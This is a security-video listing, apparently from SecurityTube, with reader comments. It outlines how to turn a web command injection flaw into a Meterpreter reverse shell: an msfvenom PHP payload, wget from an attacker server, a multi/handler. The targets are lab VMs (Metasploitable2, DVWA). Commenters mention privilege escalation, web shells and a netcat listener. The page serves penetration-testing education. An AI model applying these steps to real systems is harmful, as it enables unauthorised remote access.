Description: This video is part of the Hack of the Day series on SecurityTube. You can watch older videos using this link: http://securitytube.net/tags/hod
In this video, we look at a standard Command Injection vulnerability in a web application and see how can get a meterpreter shell on the box. The idea to do the hack is similar to how you would upload and get a web shell on a box. Here are the steps:
1. Create a php file using msfvenom and the php/meterpreter/reverse_tcp payload
2. Remove the guard '#' from the php file
3. Serve the file using a webserver - I use Python -m SimpleHTTPServer
4. In the command injection vulnerable form element - using wget to fetch the php file from the attacker server
5. Verify file has been uploaded
6. Create a exploit/multi/handler for the payload
7. Run the php meterpreter script on the vulnerable server by referencing it directly via a URL
If all goes well, you should have a meterpreter on the box :)
Questions: 1. Can someone create a quick demo of DVWA using the same principle?
2. In the video "getuid" gave us "www-data".Is privilege escalation possible? How?
Tags: hod , web-attacks , command injection , php meterpreter , metasploitable2 , dvwa ,
Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying.
I guess Privilege Escalation Only possible :-
1. If current Apache has local root vulnerability exist.
2. If getuid is changed to account-user and than exploiting if any local root available for server.
Can you point me to a demo where someone has done this with Metasploitable 2? Its a freely available download so I guess anyone can try and post a video or a blogpost or at least a bunch of screenshots :)
Looking forward to someone solving this :)
11 Years Back -> http://packetstormsecurity.com/files/30537/scalpel.c.html
I meant someone to try this with Metasploitable 2 and post a video / blog link :) Getting a PoC code to work for a particular scenario may not be as easy as it seems :)
Done With DVWA Video ... Uploading Link Here Shortly :-)
http://www.youtube.com/watch?v=TCGVvnWFlzA
DVWA Challenge Solved :-)
I think this was creative!
I like this video but can you please make a video on php\download_exec Thanks in advance making this video
DVWA Challenge Solved by Security is just an Illusion
http://www.youtube.com/watch?feature=player_embedded&v=9fXnvakEX9g
The Same exploit can be done using any malicious web shells like weevely and Webacoo
I have a demo on that , if any one interested please let me know .
one more thing this can be done using nc -lvp 4444 and browse the url of malicious php file